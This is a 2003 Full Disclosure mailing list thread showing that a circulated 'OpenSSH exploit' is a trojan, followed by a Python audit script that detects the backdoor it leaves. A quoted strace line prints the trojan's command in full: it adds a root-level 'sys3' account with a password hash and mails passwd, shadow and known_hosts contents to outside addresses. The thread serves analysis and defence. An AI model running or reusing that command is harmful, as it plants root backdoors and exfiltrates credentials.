Full Disclosure mailing list archives
Re: new openssh exploit in the wild! * is FAKE AS SH@!*
From: Vitaly Osipov <vosipov () tpg com au>
Date: Fri, 19 Sep 2003 15:28:29 +1000
This means that the original poster (gordon last) made it up himself, because he is saying:
i looked at this piece of exploit... it is binary so i'm not sure if this is a trojan or a backdoor or a virus. but i can't see anything strange while sniffing the exploit traffic. and i got root on several of my openbsd boxes with that. the bruteforcer seems to be very good.
which is obviously not true. Btw as far as I understand, the trojan code is triggered when the "exploit" is run with the offset specified, and not in a "bruteforcing" mode. W.
I'll confirm that it does this
The script actually opens a socket and connects to the target sshd but does nothing with that connection.
It also takes a pretty deep look into /proc/net looking for other networks attached to the device it is run from....
chris
On Fri, 2003-09-19 at 20:02, KF wrote:

printf("[*] sending shellcode\n") = 22
popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp; find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp | /usr/sbin/sendmail -f ownage_at_gmx.de m0nkeyhack_at_supermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") = 0x0804a6b0

-KF

gordon last wrote:

hi readers,

while i was staying idle in a so-called 0day release channel on one irc network some scriptkiddies were talking about a new 0day release. in my backlog i can see the following:

---cut
08:09 [R4lph] *** r3t0r (r4lph_at_xxx) has joined channel #0dayz
08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
---cut

i looked at this piece of exploit... it is binary so i'm not sure if this is a trojan or a backdoor or a virus. but i can't see anything strange while sniffing the exploit traffic. and i got root on several of my openbsd boxes with that. the bruteforcer seems to be very good.

i too looked at "strings theosshucksass" and found nothing suspicious. this exploit seems to be in the wild (underground) since beginning of august. that's quite a long time. i hope most admins are patching the systems now... because the exploit is getting round faster and faster.

if anyone can reverse engineer this piece it would be great if he posts his results on his list because i am really interested in the exploiting technique used for that bug. i can't get an idea on how to exploit this. hmm...

regards,
glast
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
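The popen() string in KF's trace shows what the "exploit" actually does to the host it is run from: it appends a second UID 0 account ("sys3") to /etc/passwd with a matching hash in /etc/shadow. The audit below is an added example, not code from the thread, that flags that footprint; it assumes the standard seven-field passwd and colon-separated shadow layouts, and its sample data is constructed (only the sys3 lines are taken from the trace).

```python
"""Audit passwd/shadow content for the backdoor the strace output above shows:
a second UID 0 user ("sys3") with a usable hash.  Sample data is constructed."""

def parse_colon_file(text):
    """Split a passwd/shadow style file into field lists, skipping blank lines."""
    return [line.split(":") for line in text.splitlines() if line.strip()]

def hash_is_usable(hash_field):
    """A shadow hash that is empty or locked ('*', '!', '!!') cannot log in."""
    return bool(hash_field) and not hash_field.startswith(("*", "!"))

def audit_accounts(passwd_text, shadow_text, allowed_uid0=("root",)):
    """Return (finding, account) tuples; an empty list means nothing suspicious."""
    findings = []
    shadow = {}
    for fields in parse_colon_file(shadow_text):
        if len(fields) < 2:
            findings.append(("malformed shadow line", ":".join(fields)))
            continue
        shadow[fields[0]] = fields[1]
    passwd_names = set()
    for fields in parse_colon_file(passwd_text):
        if len(fields) != 7:
            findings.append(("malformed passwd line", ":".join(fields)))
            continue
        name, pw, uid = fields[:3]
        passwd_names.add(name)
        # Any UID 0 account other than the expected one is root-equivalent.
        if uid == "0" and name not in allowed_uid0:
            findings.append(("extra UID 0 account", name))
        # 'x' promises a shadow entry; a missing one hints at file tampering.
        if pw == "x" and name not in shadow:
            findings.append(("passwd entry without shadow entry", name))
    # A usable hash for a name passwd never defines points the other way.
    for name, h in shadow.items():
        if name not in passwd_names and hash_is_usable(h):
            findings.append(("shadow hash without passwd entry", name))
    return findings

# Constructed sample: a small clean system plus the appended "sys3" backdoor.
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
          "sys3:x:0:103::/:/bin/sh\n")
SHADOW = ("root:$1$constructed$notarealhash:12311:0:99999:7:::\n"
          "alice:$1$constructed$notarealhash:12311:0:99999:7:::\n"
          "sys3:$1$nWXmkX74$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:99999:7:::\n")
if __name__ == "__main__":
    for finding, account in audit_accounts(PASSWD, SHADOW):
        print(f"{finding}: {account}")
```

The same check run against a live host's files (the process needs read access to /etc/shadow) will also surface the orphaned shadow line left behind if someone removes the passwd entry but not the hash.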